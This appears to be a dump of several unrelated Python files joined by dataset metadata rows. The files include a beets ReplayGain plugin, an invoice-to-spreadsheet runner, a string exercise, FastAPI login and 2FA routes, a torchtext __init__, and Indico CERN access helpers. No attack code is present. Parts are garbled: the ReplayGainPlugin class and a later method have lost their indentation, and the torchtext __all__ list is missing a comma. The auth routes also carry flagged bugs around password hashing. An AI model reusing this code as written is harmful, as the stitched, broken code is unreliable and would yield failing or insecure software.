    def _set_file(self):
        """Initialize the filesrc element with the next file to be analyzed.
        """
        # No more files, we're done
        if len(self._files) == 0:
            return False

        self._file = self._files.pop(0)

        # Ensure the filesrc element received the paused state of the
        # pipeline in a blocking manner
        self._src.sync_state_with_parent()
        self._src.get_state(self.Gst.CLOCK_TIME_NONE)

        # Ensure the decodebin element receives the paused state of the
        # pipeline in a blocking manner
        self._decbin.sync_state_with_parent()
        self._decbin.get_state(self.Gst.CLOCK_TIME_NONE)

        # Disconnect the decodebin element from the pipeline, set its
        # state to READY to clear it.
        self._decbin.unlink(self._conv)
        self._decbin.set_state(self.Gst.State.READY)

        # Set a new file on the filesrc element, can only be done in the
        # READY state
        self._src.set_state(self.Gst.State.READY)
        self._src.set_property("location", py3_path(syspath(self._file.path)))

        self._decbin.link(self._conv)
        self._pipe.set_state(self.Gst.State.READY)

        return True

    def _set_next_file(self):
        """Set the next file to be analyzed while keeping the pipeline
        in the PAUSED state so that the rganalysis element can correctly
        handle album gain.
        """
        # A blocking pause
        self._pipe.set_state(self.Gst.State.PAUSED)
        self._pipe.get_state(self.Gst.CLOCK_TIME_NONE)

        # Try setting the next file
        ret = self._set_file()
        if ret:
            # Seek to the beginning in order to clear the EOS state of the
            # various elements of the pipeline
            self._pipe.seek_simple(self.Gst.Format.TIME,
                                   self.Gst.SeekFlags.FLUSH,
                                   0)
            self._pipe.set_state(self.Gst.State.PLAYING)

        return ret

    def _on_pad_added(self, decbin, pad):
        # Complete the dynamic decodebin -> audioconvert link once
        # decodebin has determined the stream type.
        sink_pad = self._conv.get_compatible_pad(pad, None)
        assert(sink_pad is not None)
        pad.link(sink_pad)

    def _on_pad_removed(self, decbin, pad):
        # Called when the decodebin element is disconnected from the
        # rest of the pipeline while switching input files
        peer = pad.get_peer()
        assert(peer is None)
class AudioToolsBackend(Backend):
    """ReplayGain backend that uses `Python Audio Tools
    <http://audiotools.sourceforge.net/>`_ and its capabilities to read more
    file formats and compute ReplayGain values using it replaygain module.
    """

    def __init__(self, config, log):
        """Verify that the audiotools modules can be imported."""
        super(AudioToolsBackend, self).__init__(config, log)
        self._import_audiotools()

    def _import_audiotools(self):
        """Check whether it's possible to import the necessary modules.
        There is no check on the file formats at runtime.

        :raises :exc:`ReplayGainError`: if the modules cannot be imported
        """
        try:
            import audiotools
            import audiotools.replaygain
        except ImportError:
            raise FatalReplayGainError(
                u"Failed to load audiotools: audiotools not found"
            )
        self._mod_audiotools = audiotools
        self._mod_replaygain = audiotools.replaygain

    def open_audio_file(self, item):
        """Open the file to read the PCM stream from the using
        ``item.path``.

        :return: the audiofile instance
        :rtype: :class:`audiotools.AudioFile`
        :raises :exc:`ReplayGainError`: if the file is not found or the
            file format is not supported
        """
        try:
            audiofile = self._mod_audiotools.open(item.path)
        except IOError:
            raise ReplayGainError(
                u"File {} was not found".format(item.path)
            )
        except self._mod_audiotools.UnsupportedFile:
            raise ReplayGainError(
                u"Unsupported file type {}".format(item.format)
            )

        return audiofile

    def init_replaygain(self, audiofile, item):
        """Return an initialized :class:`audiotools.replaygain.ReplayGain`
        instance, which requires the sample rate of the song(s) on which
        the ReplayGain values will be computed. The item is passed in case
        the sample rate is invalid to log the stored item sample rate.

        :return: initialized replagain object
        :rtype: :class:`audiotools.replaygain.ReplayGain`
        :raises: :exc:`ReplayGainError` if the sample rate is invalid
        """
        try:
            rg = self._mod_replaygain.ReplayGain(audiofile.sample_rate())
        except ValueError:
            # Fix: an unreachable `return` used to follow this raise.
            raise ReplayGainError(
                u"Unsupported sample rate {}".format(item.samplerate))
        return rg

    def compute_track_gain(self, items):
        """Compute ReplayGain values for the requested items.

        :return list: list of :class:`Gain` objects
        """
        return [self._compute_track_gain(item) for item in items]

    def _title_gain(self, rg, audiofile):
        """Get the gain result pair from PyAudioTools using the `ReplayGain`
        instance `rg` for the given `audiofile`.

        Wraps `rg.title_gain(audiofile.to_pcm())` and throws a
        `ReplayGainError` when the library fails.
        """
        try:
            # The method needs an audiotools.PCMReader instance that can
            # be obtained from an audiofile instance.
            return rg.title_gain(audiofile.to_pcm())
        except ValueError as exc:
            # `audiotools.replaygain` can raise a `ValueError` if the sample
            # rate is incorrect.
            self._log.debug(u'error in rg.title_gain() call: {}', exc)
            raise ReplayGainError(u'audiotools audio data error')

    def _compute_track_gain(self, item):
        """Compute ReplayGain value for the requested item.

        :rtype: :class:`Gain`
        """
        audiofile = self.open_audio_file(item)
        rg = self.init_replaygain(audiofile, item)

        # Each call to title_gain on a ReplayGain object returns peak and gain
        # of the track.
        rg_track_gain, rg_track_peak = self._title_gain(rg, audiofile)

        self._log.debug(u'ReplayGain for track {0} - {1}: {2:.2f}, {3:.2f}',
                        item.artist, item.title, rg_track_gain, rg_track_peak)
        return Gain(gain=rg_track_gain, peak=rg_track_peak)

    def compute_album_gain(self, album):
        """Compute ReplayGain values for the requested album and its items.

        :rtype: :class:`AlbumGain`
        """
        self._log.debug(u'Analysing album {0}', album)

        # The first item is taken and opened to get the sample rate to
        # initialize the replaygain object. The object is used for all the
        # tracks in the album to get the album values.
        item = list(album.items())[0]
        audiofile = self.open_audio_file(item)
        rg = self.init_replaygain(audiofile, item)

        track_gains = []
        for item in album.items():
            audiofile = self.open_audio_file(item)
            rg_track_gain, rg_track_peak = self._title_gain(rg, audiofile)
            track_gains.append(
                Gain(gain=rg_track_gain, peak=rg_track_peak)
            )
            self._log.debug(u'ReplayGain for track {0}: {1:.2f}, {2:.2f}',
                            item, rg_track_gain, rg_track_peak)

        # After getting the values for all tracks, it's possible to get the
        # album values.
        rg_album_gain, rg_album_peak = rg.album_gain()
        self._log.debug(u'ReplayGain for album {0}: {1:.2f}, {2:.2f}',
                        album, rg_album_gain, rg_album_peak)

        return AlbumGain(
            Gain(gain=rg_album_gain, peak=rg_album_peak),
            track_gains=track_gains
        )
# Main plugin logic.
class ReplayGainPlugin(BeetsPlugin):
"""Provides ReplayGain analysis.
"""
backends = {
"command": CommandBackend,
"gstreamer": GStreamerBackend,
"audiotools": AudioToolsBackend,
"bs1770gain": Bs1770gainBackend,
}
def __init__(self):
super(ReplayGainPlugin, self).__init__()
# default backend is 'command' for backward-compatibility.
self.config.add({
'overwrite': False,
'auto': True,
'backend': u'command',
'targetlevel': 89,
'r128': ['Opus'],
})
self.overwrite = self.config['overwrite'].get(bool)
backend_name = self.config['backend'].as_str()
if backend_name not in self.backends:
raise ui.UserError(
u"Selected ReplayGain backend {0} is not supported. "
u"Please select one of: {1}".format(
backend_name,
u', '.join(self.backends.keys())
)
)
# On-import analysis.
if self.config['auto']:
self.import_stages = [self.imported]
# Formats to use R128.
self.r128_whitelist = self.config['r128'].as_str_seq()
try:
self.backend_instance = self.backends[backend_name](
self.config, self._log
)
except (ReplayGainError, FatalReplayGainError) as e:
raise ui.UserError(
u'replaygain initialization failed: {0}'.format(e))
self.r128_backend_instance = ''
def should_use_r128(self, item):
"""Checks the plugin setting to decide whether the calculation
should be done using the EBU R128 standard and use R128_ tags instead.
"""
return item.format in self.r128_whitelist
def track_requires_gain(self, item):
return self.overwrite or \
(self.should_use_r128(item) and not item.r128_track_gain) or \
(not self.should_use_r128(item) and
(not item.rg_track_gain or not item.rg_track_peak))
def album_requires_gain(self, album):
# Skip calculating gain only when *all* files don't need
# recalculation. This way, if any file among an album's tracks
# needs recalculation, we still get an accurate album gain
# value.
return self.overwrite or \
any([self.should_use_r128(item) and
(not item.r128_track_gain or not item.r128_album_gain)
for item in album.items()]) or \
any([not self.should_use_r128(item) and
(not item.rg_album_gain or not item.rg_album_peak)
for item in album.items()])
def store_track_gain(self, item, track_gain):
item.rg_track_gain = track_gain.gain
item.rg_track_peak = track_gain.peak
item.store()
self._log.debug(u'applied track gain {0}, peak {1}',
item.rg_track_gain, item.rg_track_peak)
def store_track_r128_gain(self, item, track_gain):
item.r128_track_gain = int(round(track_gain.gain * pow(2, 8)))
item.store()
self._log.debug(u'applied r128 track gain {0}', item.r128_track_gain)
def store_album_gain(self, album, album_gain):
album.rg_album_gain = album_gain.gain
album.rg_album_peak = album_gain.peak
album.store()
self._log.debug(u'applied album gain {0}, peak {1}',
album.rg_album_gain, album.rg_album_peak)
def store_album_r128_gain(self, album, album_gain):
album.r128_album_gain = int(round(album_gain.gain * pow(2, 8)))
album.store()
self._log.debug(u'applied r128 album gain {0}', album.r128_album_gain)
    def handle_album(self, album, write, force=False):
        """Compute album and track replay gain store it in all of the
        album's items.
        If ``write`` is truthy then ``item.write()`` is called for each
        item. If replay gain information is already present in all
        items, nothing is done.
        """
        if not force and not self.album_requires_gain(album):
            self._log.info(u'Skipping album {0}', album)
            return
        self._log.info(u'analyzing {0}', album)
        # An album must be uniformly R128 or uniformly classic ReplayGain;
        # a mix cannot produce a consistent album gain.
        if (any([self.should_use_r128(item) for item in album.items()]) and not
                all(([self.should_use_r128(item) for item in album.items()]))):
            raise ReplayGainError(
                u"Mix of ReplayGain and EBU R128 detected"
                u" for some tracks in album {0}".format(album)
            )
        # Pick the backend and store callbacks for the album's standard.
        if any([self.should_use_r128(item) for item in album.items()]):
            if self.r128_backend_instance == '':
                # The R128 backend is created lazily on first use.
                self.init_r128_backend()
            backend_instance = self.r128_backend_instance
            store_track_gain = self.store_track_r128_gain
            store_album_gain = self.store_album_r128_gain
        else:
            backend_instance = self.backend_instance
            store_track_gain = self.store_track_gain
            store_album_gain = self.store_album_gain
        try:
            album_gain = backend_instance.compute_album_gain(album)
            # The backend must return exactly one gain per track.
            if len(album_gain.track_gains) != len(album.items()):
                raise ReplayGainError(
                    u"ReplayGain backend failed "
                    u"for some tracks in album {0}".format(album)
                )
            store_album_gain(album, album_gain.album_gain)
            for item, track_gain in zip(album.items(), album_gain.track_gains):
                store_track_gain(item, track_gain)
                if write:
                    item.try_write()
        except ReplayGainError as e:
            # Non-fatal: log and continue with other albums.
            self._log.info(u"ReplayGain error: {0}", e)
        except FatalReplayGainError as e:
            raise ui.UserError(
                u"Fatal replay gain error: {0}".format(e))
    def handle_track(self, item, write, force=False):
        """Compute track replay gain and store it in the item.
        If ``write`` is truthy then ``item.write()`` is called to write
        the data to disk. If replay gain information is already present
        in the item, nothing is done.
        """
        if not force and not self.track_requires_gain(item):
            self._log.info(u'Skipping track {0}', item)
            return
        self._log.info(u'analyzing {0}', item)
        # Select R128 vs. classic backend based on the item's format.
        if self.should_use_r128(item):
            if self.r128_backend_instance == '':
                # The R128 backend is created lazily on first use.
                self.init_r128_backend()
            backend_instance = self.r128_backend_instance
            store_track_gain = self.store_track_r128_gain
        else:
            backend_instance = self.backend_instance
            store_track_gain = self.store_track_gain
        try:
            # The backend API is list-based; we pass a single-item list.
            track_gains = backend_instance.compute_track_gain([item])
            if len(track_gains) != 1:
                raise ReplayGainError(
                    u"ReplayGain backend failed for track {0}".format(item)
                )
            store_track_gain(item, track_gains[0])
            if write:
                item.try_write()
        except ReplayGainError as e:
            # Non-fatal: log and continue with other tracks.
            self._log.info(u"ReplayGain error: {0}", e)
        except FatalReplayGainError as e:
            raise ui.UserError(
                u"Fatal replay gain error: {0}".format(e))
    def init_r128_backend(self):
        """Lazily create the backend used for EBU R128 measurements.

        R128 always goes through the 'bs1770gain' backend in EBU mode,
        regardless of the configured main backend.
        """
        backend_name = 'bs1770gain'
        try:
            self.r128_backend_instance = self.backends[backend_name](
                self.config, self._log
            )
        except (ReplayGainError, FatalReplayGainError) as e:
            raise ui.UserError(
                u'replaygain initialization failed: {0}'.format(e))
        self.r128_backend_instance.method = '--ebu'
def imported(self, session, task):
"""Add replay gain info to items or albums of ``task``.
"""
if task.is_album:
self.handle_album(task.album, False)
else:
self.handle_track(task.item, False)
    def commands(self):
        """Return the "replaygain" ui subcommand.
        """
        def func(lib, opts, args):
            # Resolve -w/-W/config default into a single write flag.
            write = ui.should_write(opts.write)
            force = opts.force
            # -a/--album analyzes whole albums; otherwise single items.
            if opts.album:
                for album in lib.albums(ui.decargs(args)):
                    self.handle_album(album, write, force)
            else:
                for item in lib.items(ui.decargs(args)):
                    self.handle_track(item, write, force)
        cmd = ui.Subcommand('replaygain', help=u'analyze for ReplayGain')
        cmd.parser.add_album_option()
        cmd.parser.add_option(
            "-f", "--force", dest="force", action="store_true", default=False,
            help=u"analyze all files, including those that "
            "already have ReplayGain metadata")
        cmd.parser.add_option(
            "-w", "--write", default=None, action="store_true",
            help=u"write new metadata to files' tags")
        cmd.parser.add_option(
            "-W", "--nowrite", dest="write", action="store_false",
            help=u"don't write metadata (opposite of -w)")
        cmd.func = func
        return [cmd]
| 37.191948
| 79
| 0.596058
|
4a0ea08874afc508076444aea5864c451383890e
| 3,103
|
py
|
Python
|
runner.py
|
dinheironamesa/Faturas_Energia
|
3a9c65a65991b9bdf5754675a8ac87ab1bdf0846
|
[
"Apache-2.0"
] | null | null | null |
runner.py
|
dinheironamesa/Faturas_Energia
|
3a9c65a65991b9bdf5754675a8ac87ab1bdf0846
|
[
"Apache-2.0"
] | null | null | null |
runner.py
|
dinheironamesa/Faturas_Energia
|
3a9c65a65991b9bdf5754675a8ac87ab1bdf0846
|
[
"Apache-2.0"
] | null | null | null |
from os import listdir
from xlsxwriter import Workbook
from scrapper import scrape
if __name__ == '__main__':
    workbook = Workbook('fatura.xlsx')
    worksheet = workbook.add_worksheet()

    # Column layout: (column letter, header label == scrape-result key).
    # NOTE(review): columns J and K both carry 'leitura_anual' in the
    # original code — one of them was probably meant to be a different
    # reading; confirm against the scrapper output before changing.
    columns = [
        ('A', 'produto1'),
        ('B', 'unidade'),
        ('C', 'grandezas_faturadas'),
        ('D', 'valor_unitario'),
        ('E', 'valor_total'),
        ('F', 'base_de_calculo'),
        ('G', 'aliquota_icms'),
        ('H', 'produto2'),
        ('I', 'leitura_anterior'),
        ('J', 'leitura_anual'),
        ('K', 'leitura_anual'),
        ('L', 'medido'),
        ('M', 'contratado'),
        ('N', 'faturado'),
        ('O', 'tarifa'),
        ('P', 'total'),
    ]

    # Header row.
    for col, header in columns:
        worksheet.write('{}1'.format(col), header)

    # Only process PDF files found in pdfs/.
    pdfs = filter(
        lambda pdf: pdf.lower().endswith('.pdf'),
        listdir('pdfs/')
    )

    total_pdfs = 1
    # index is incremented *before* the first write, so data starts at
    # row 3 (row 2 stays empty) — kept as-is to preserve the original
    # spreadsheet layout.
    index = 2
    for result in map(scrape, pdfs):
        print('PDF #{} was processed.'.format(total_pdfs))
        total_pdfs += 1
        for data in result:
            index += 1
            # One table-driven loop replaces 16 hand-written write calls.
            for col, key in columns:
                worksheet.write('{}{}'.format(col, index), data.get(key))

    workbook.close()
| 29.273585
| 58
| 0.467612
|
4a0ea0c4afcdbb01f83d9ddb254b19882dcd2f98
| 969
|
py
|
Python
|
week2/task8.py
|
sdanil-ops/stepik-beegeek-python
|
02302ab85d581962a82cbce766b7b284d4c5491e
|
[
"MIT"
] | null | null | null |
week2/task8.py
|
sdanil-ops/stepik-beegeek-python
|
02302ab85d581962a82cbce766b7b284d4c5491e
|
[
"MIT"
] | null | null | null |
week2/task8.py
|
sdanil-ops/stepik-beegeek-python
|
02302ab85d581962a82cbce766b7b284d4c5491e
|
[
"MIT"
] | 1
|
2021-08-18T00:58:27.000Z
|
2021-08-18T00:58:27.000Z
|
# -----------------------------------------------------------
# Copyright (c) 2021. Danil Smirnov
# The program is fed three lines, each on a separate line.
# The program should print the entered lines in reverse order,
# each on a separate line. Uses code from previous task.
# Just paste it.
# -----------------------------------------------------------
from typing import List
from task1 import TestUnit
class ThreeStrings:
    """Holds a list of strings and represents them in reverse order,
    one string per line, each line terminated by a newline.
    """

    def __init__(self, strings: List[str]):
        self.strings = strings

    def __repr__(self):
        # join is linear and clearer than repeated string concatenation;
        # each reversed entry keeps its own trailing newline (so an empty
        # input yields an empty string, exactly like the loop it replaces).
        return ''.join(s + '\n' for s in reversed(self.strings))
# test
if __name__ == '__main__':
    # TestUnit (from task1) compares repr(ThreeStrings([...])) against the
    # expected string and exposes the outcome as .is_passed.
    test = TestUnit(ThreeStrings, ['i', 'was', 'born'], 'born\nwas\ni\n')
    print('passed' if test.is_passed else 'failed')
# run
# if __name__ == '__main__':
# strings = ThreeStrings([input() for _ in range(3)])
# print(strings)
| 27.685714
| 73
| 0.544892
|
4a0ea1a52d8454db9ac2e9016f5b06c6e6f96a80
| 7,060
|
py
|
Python
|
SEPHIRA/FastAPI/resources/auth.py
|
dman926/Flask-API
|
49e052159a3915ec25305141ecdd6cdeb1d7a25c
|
[
"MIT"
] | 4
|
2021-04-23T16:51:57.000Z
|
2021-06-06T20:28:08.000Z
|
SEPHIRA/FastAPI/resources/auth.py
|
dman926/Flask-API
|
49e052159a3915ec25305141ecdd6cdeb1d7a25c
|
[
"MIT"
] | null | null | null |
SEPHIRA/FastAPI/resources/auth.py
|
dman926/Flask-API
|
49e052159a3915ec25305141ecdd6cdeb1d7a25c
|
[
"MIT"
] | 3
|
2021-03-21T22:29:05.000Z
|
2021-06-06T20:30:18.000Z
|
from fastapi import APIRouter, Request
from fastapi.security.oauth2 import OAuth2PasswordRequestForm
from config import APISettings
from fastapi import Depends
from pydantic import BaseModel, EmailStr
from typing import Optional
from mongoengine.errors import NotUniqueError, DoesNotExist
from modules.JWT import Token, create_access_token, create_refresh_token, get_jwt_identity, get_raw_token
from database.models import User, UserModel
from resources.errors import UserAlreadyExistsError, UnauthorizedError, MissingOtpError
from services.mail_service import send_email_async
from services.util_service import base_model_to_clean_dict
from datetime import timedelta
from time import sleep
import base64
import os
# All auth endpoints live under <ROUTE_BASE>/auth and are grouped under
# the "Auth" tag in the generated OpenAPI docs.
router = APIRouter(
	prefix=APISettings.ROUTE_BASE + 'auth',
	tags=['Auth']
)
###########
# SCHEMAS #
###########
class EmailPasswordForm(BaseModel):
	"""JSON login/signup payload.

	``client_secret`` optionally carries a JWT whose identity is used
	instead of ``username``; ``client_id`` optionally carries a one-time
	2FA code (see the login handlers).
	"""
	username: EmailStr
	password: str
	client_secret: Optional[str] = None
	client_id: Optional[str] = None
class PasswordForm(BaseModel):
	"""Payload carrying only a password (check/reset endpoints)."""
	password: str
class OtpForm(BaseModel):
	"""Payload carrying a one-time 2FA code."""
	otp: str
class EmailForm(BaseModel):
	"""Payload carrying an email address (forgot-password endpoint)."""
	# NOTE(review): plain ``str`` — consider EmailStr for validation,
	# as used by EmailPasswordForm.
	email: str
##########
# ROUTES #
##########
@router.post('/signup')
async def signup(form_data: EmailPasswordForm):
	"""Create a new user account and return its id.

	The very first account created becomes an admin (bootstrap). The
	password is hashed before the user document is saved.

	Raises UserAlreadyExistsError when the email is already registered.
	"""
	try:
		user = User(email=form_data.username, password=form_data.password)
		if User.objects.count() == 0:
			# Bootstrap: the first registered user administers the site.
			user.admin = True
		user.hash_password()
		user.save()
		return {'id': str(user.id)}
	except NotUniqueError:
		raise UserAlreadyExistsError().http_exception
	# The original trailing ``except Exception as e: raise e`` was a
	# no-op re-raise and has been removed; unexpected errors propagate
	# unchanged either way.
@router.post('/login')
async def login(form_data: EmailPasswordForm):
	"""Authenticate a user and return an access/refresh token pair.

	``client_secret``, when present, is a JWT whose identity is used to
	look the user up instead of ``username``. ``client_id`` doubles as
	the one-time 2FA code when the account has 2FA enabled.
	"""
	try:
		user = None
		if form_data.client_secret:
			user = User.objects.get(email=get_jwt_identity(form_data.client_secret))
		else:
			user = User.objects.get(email=form_data.username)
		if not user.check_password(form_data.password):
			raise UnauthorizedError
		if user.twoFactorEnabled:
			otp = form_data.client_id
			if not otp:
				raise MissingOtpError
			if not user.verify_totp(otp):
				raise UnauthorizedError
		return {
			'access_token': create_access_token(identity=str(user.id)),
			'refresh_token': create_refresh_token(identity=str(user.id))
		}
	except (UnauthorizedError, DoesNotExist):
		# Fixed delay and a single generic message blunt brute-force and
		# user-enumeration attempts.
		sleep(2)
		raise UnauthorizedError(detail='Incorrect email, password, or otp').http_exception
	except MissingOtpError:
		raise MissingOtpError().http_exception
	except Exception as e:
		raise e
# needed a separate login for docs due to how it sends the login data
@router.post('/docs-login')
async def docs_login(form_data: OAuth2PasswordRequestForm = Depends()):
	"""Login endpoint for the interactive API docs (form-encoded).

	Mirrors ``login`` but accepts an OAuth2PasswordRequestForm. Renamed
	from ``login`` (which shadowed the JSON login handler at module
	level); FastAPI routes via the decorator, so the path is unchanged.
	"""
	try:
		if form_data.client_secret:
			user = User.objects.get(email=get_jwt_identity(form_data.client_secret))
		else:
			user = User.objects.get(email=form_data.username)
		if not user.check_password(form_data.password):
			raise UnauthorizedError
		if user.twoFactorEnabled:
			otp = form_data.client_id
			if not otp:
				raise MissingOtpError
			if not user.verify_totp(otp):
				raise UnauthorizedError
		return {
			'access_token': create_access_token(identity=str(user.id)),
			'refresh_token': create_refresh_token(identity=str(user.id))
		}
	except (UnauthorizedError, DoesNotExist):
		# Fixed delay to blunt brute-force / user-enumeration attempts.
		sleep(2)
		raise UnauthorizedError(detail='Incorrect email, password, or otp').http_exception
	except MissingOtpError:
		raise MissingOtpError().http_exception
@router.post('/refresh')
async def token_refresh2(token: Token = Depends(get_raw_token)):
	"""Exchange a valid refresh token for a fresh access/refresh pair.

	Rejects non-refresh tokens and tokens whose user no longer exists.
	"""
	try:
		if 'refresh' not in token or not token['refresh']:
			raise UnauthorizedError
		identity = token['sub']
		User.objects.get(id=identity)  # Verify the user still exists
		return {
			'access_token': create_access_token(identity=identity),
			'refresh_token': create_refresh_token(identity=identity)
		}
		# (Removed an unreachable ``return True`` that followed the
		# return above, and the no-op ``except Exception: raise e``.)
	except UnauthorizedError:
		raise UnauthorizedError(detail='Invalid token. Not a refresh token').http_exception
	except DoesNotExist:
		raise UnauthorizedError(detail='Invalid token').http_exception
@router.get('/check-password')
async def check_password(password_body: PasswordForm, identity: str = Depends(get_jwt_identity)):
	"""Verify the authenticated user's current password.

	NOTE(review): a GET route with a request body is unusual and some
	HTTP clients will not send one — confirm callers can actually use
	this (POST would be conventional).
	"""
	try:
		user = User.objects.get(id=identity)
		authorized = user.check_password(password_body.password)
		if not authorized:
			raise UnauthorizedError
		return 'ok'
	except (UnauthorizedError, DoesNotExist):
		raise UnauthorizedError().http_exception
	except Exception as e:
		raise e
@router.get('/2fa')
async def get_otp_code(identity: str = Depends(get_jwt_identity)):
	"""(Re)generate the user's TOTP secret and return the provisioning URI.

	Each call rotates the secret (10 random bytes, base32-encoded), so
	previously scanned authenticator entries stop working.
	"""
	try:
		user = User.objects.get(id=identity)
		user.otpSecret = base64.b32encode(os.urandom(10)).decode('utf8')
		user.save()
		return user.get_totp_uri()
	except DoesNotExist:
		raise UnauthorizedError().http_exception
	except Exception as e:
		raise e
@router.post('/2fa')
async def verify_otp_code(otp_body: OtpForm, identity: str = Depends(get_jwt_identity)):
	"""Check a one-time 2FA code for the authenticated user."""
	try:
		user = User.objects.get(id=identity)
		if not user.verify_totp(otp_body.otp):
			raise UnauthorizedError
		return True
	except (UnauthorizedError, DoesNotExist):
		raise UnauthorizedError().http_exception
	except Exception as e:
		raise e
@router.post('/forgot')
async def forgot_password(email_body: EmailForm, request: Request):
	"""Email a password-reset link containing a 1-day access token."""
	try:
		user = User.objects.get(email=email_body.email)
		reset_token = create_access_token(str(user.id), expires_delta=timedelta(days=1))
		send_email_async(
			'[SEPHIRA] Reset Your Password',
			[email_body.email],
			'reset_password.html',
			{
				'url': request.client.host + '/reset/?t=' + reset_token,
			}
		)
		return 'ok'
	except DoesNotExist:
		# Same response (after a delay) as success, so callers can't
		# probe which emails have accounts.
		sleep(2)
		return 'ok'
	except Exception as e:
		raise e
@router.post('/reset')
async def reset_password(password_body: PasswordForm, identity: str = Depends(get_jwt_identity)):
	"""Set a new password for the token's user and email a notification.

	NOTE(review): ``modify`` persists the plaintext password before
	``hash_password``/``save`` overwrite it with the hash — confirm this
	transient plaintext write is acceptable, or hash before modifying.
	"""
	try:
		user = User.objects.get(id=identity)
		user.modify(password=password_body.password)
		user.hash_password()
		user.save()
		send_email_async(
			'[SEPHIRA] Password Has Been Reset',
			[user.email],
			'password_reset.html'
		)
		return 'ok'
	except Exception as e:
		raise e
@router.get('/user')
async def get_user(identity: str = Depends(get_jwt_identity)):
	"""Return the authenticated user's serialized profile."""
	try:
		return User.objects.get(id=identity).serialize()
	except DoesNotExist:
		raise UnauthorizedError().http_exception
	except Exception as e:
		raise e
@router.put('/user')
async def update_user(user: UserModel, identity: str = Depends(get_jwt_identity)):
	"""Update the authenticated user's profile from a UserModel payload.

	Users may not grant themselves admin.

	NOTE(review): the final hash/save is invoked on ``user`` (the request
	payload model), not on ``foundUser`` (the DB document) — it looks
	like the hashed password is never persisted; verify against the
	model definitions and fix if so.
	"""
	try:
		foundUser = User.objects.get(id=identity)
		if user.admin:
			raise UnauthorizedError # Cannot set themselves as admin
		foundUser.update(**base_model_to_clean_dict(user))
		if user.password:
			user.hash_password()
			user.save()
		return True
	except (UnauthorizedError, DoesNotExist):
		raise UnauthorizedError().http_exception
	except Exception as e:
		raise e
@router.delete('/user')
async def delete_user(identity: str = Depends(get_jwt_identity)):
	"""Permanently delete the authenticated user's account."""
	try:
		# TODO: 'archive' the user instead of deleting
		User.objects.get(id=identity).delete()
		return True
	except DoesNotExist:
		raise UnauthorizedError().http_exception
	except Exception as e:
		raise e
| 28.699187
| 105
| 0.754674
|
4a0ea1dc6b04995e282b5a8430c52c4efcc2aefc
| 639
|
py
|
Python
|
torchtext/datasets/__init__.py
|
kortemaki/text
|
ea64e1d28c794ed6ffc0a5c66651c33e2f57f01f
|
[
"BSD-3-Clause"
] | 1
|
2018-04-04T08:31:40.000Z
|
2018-04-04T08:31:40.000Z
|
torchtext/datasets/__init__.py
|
kortemaki/text
|
ea64e1d28c794ed6ffc0a5c66651c33e2f57f01f
|
[
"BSD-3-Clause"
] | null | null | null |
torchtext/datasets/__init__.py
|
kortemaki/text
|
ea64e1d28c794ed6ffc0a5c66651c33e2f57f01f
|
[
"BSD-3-Clause"
] | null | null | null |
from .language_modeling import LanguageModelingDataset, WikiText2, PennTreebank # NOQA
from .snli import SNLI
from .sst import SST
from .translation import TranslationDataset, Multi30k, IWSLT, WMT14 # NOQA
from .sequence_tagging import SequenceTaggingDataset, UDPOS # NOQA
from .trec import TREC
from .imdb import IMDB
__all__ = ['LanguageModelingDataset',
'SNLI',
'SST',
'TranslationDataset',
'Multi30k',
'IWSLT',
'WMT14'
'WikiText2',
'PennTreeBank',
'TREC',
'IMDB',
'SequenceTaggingDataset',
'UDPOS']
| 27.782609
| 87
| 0.613459
|
4a0ea21336559daddaebbf35f06f4c5f4879864b
| 16,133
|
py
|
Python
|
cern_access/indico_cern_access/util.py
|
plourenco/indico-plugins-cern
|
5be71a552825afdd93a3bc7e7141335b8559c41a
|
[
"MIT"
] | null | null | null |
cern_access/indico_cern_access/util.py
|
plourenco/indico-plugins-cern
|
5be71a552825afdd93a3bc7e7141335b8559c41a
|
[
"MIT"
] | null | null | null |
cern_access/indico_cern_access/util.py
|
plourenco/indico-plugins-cern
|
5be71a552825afdd93a3bc7e7141335b8559c41a
|
[
"MIT"
] | null | null | null |
# This file is part of the CERN Indico plugins.
# Copyright (C) 2014 - 2020 CERN
#
# The CERN Indico plugins are free software; you can redistribute
# them and/or modify them under the terms of the MIT License; see
# the LICENSE file for more details.
from __future__ import unicode_literals
import hashlib
import hmac
import json
import random
import re
import dateutil.parser
import requests
from flask import session
from jinja2.filters import do_truncate
from pytz import timezone
from werkzeug.exceptions import Forbidden
from indico.core.db import db
from indico.core.notifications import make_email, send_email
from indico.modules.events import Event
from indico.modules.events.registration.models.forms import RegistrationForm
from indico.modules.events.registration.models.registrations import Registration
from indico.modules.events.registration.util import get_ticket_attachments
from indico.modules.events.requests.models.requests import Request
from indico.util.date_time import now_utc
from indico.util.placeholders import replace_placeholders
from indico.util.string import remove_accents, unicode_to_ascii
from indico.web.flask.templating import get_template_module
from indico_cern_access import _
from indico_cern_access.models.access_request_regforms import CERNAccessRequestRegForm
from indico_cern_access.models.access_requests import CERNAccessRequest, CERNAccessRequestState
def get_last_request(event):
    """Return the last CERN Access request for the event."""
    # Local import — presumably avoids a circular import with the
    # definition module; confirm before moving to module level.
    from indico_cern_access.definition import CERNAccessRequestDefinition
    return Request.find_latest_for_event(event, CERNAccessRequestDefinition.name)
def get_requested_forms(event):
    """Return list of registration forms with requested access to CERN."""
    query = RegistrationForm.query.with_parent(event)
    query = query.join(CERNAccessRequestRegForm)
    query = query.filter(CERNAccessRequestRegForm.is_active)
    return query.all()
def get_requested_registrations(event, regform=None, only_active=False):
    """By default returns a list of requested registrations of an event

    :param regform: if specified, returns only registrations with that registration form
    :param only_active: if True, keep only registrations whose access
                        request is active; otherwise keep everything
                        that is not withdrawn
    """
    query = (Registration.query.with_parent(event)
             .join(CERNAccessRequest))
    if only_active:
        query = query.filter(CERNAccessRequest.is_active)
    else:
        query = query.filter(~CERNAccessRequest.is_withdrawn)
    if regform:
        query = query.filter(Registration.registration_form_id == regform.id)
    return query.all()
def _send_adams_http_request(method, data):
    """Send *data* (JSON-encoded) to the configured ADaMS URL.

    :param method: HTTP method, e.g. 'POST' or 'DELETE'
    :raises AdamsError: on any transport or HTTP error status
    :return: True iff the response status was 200
    """
    from indico_cern_access.plugin import CERNAccessPlugin
    url = CERNAccessPlugin.settings.get('adams_url')
    credentials = (CERNAccessPlugin.settings.get('username'), CERNAccessPlugin.settings.get('password'))
    request_headers = {'Content-Type': 'application/json'}
    try:
        r = requests.request(method, url, data=json.dumps(data), headers=request_headers, auth=credentials)
        # Any non-2xx/3xx status raises and is converted to AdamsError below.
        r.raise_for_status()
    except requests.exceptions.RequestException:
        CERNAccessPlugin.logger.exception('Request to ADAMS failed (%r)', data)
        raise AdamsError(_('Sending request to ADAMS failed'))
    return r.status_code == requests.codes.all_ok
